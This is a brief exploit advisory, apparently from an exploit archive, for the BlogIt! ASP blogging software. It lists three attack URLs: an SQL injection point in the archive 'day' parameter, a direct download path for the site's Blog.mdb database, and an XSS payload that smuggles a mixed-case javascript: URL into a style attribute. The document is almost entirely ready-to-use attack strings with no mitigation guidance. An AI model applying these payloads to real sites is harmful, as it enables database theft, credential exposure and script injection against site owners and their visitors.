id: 4690
date: 01/16/2009
title: BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities
author: Pouya_Server
cves: 

====================================================
BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities
====================================================


#########################################################
---------------------------------------------------------
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Vulnerability : (SQL/DD/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
---------------------------------



#  0day.today [2023-03-26]  #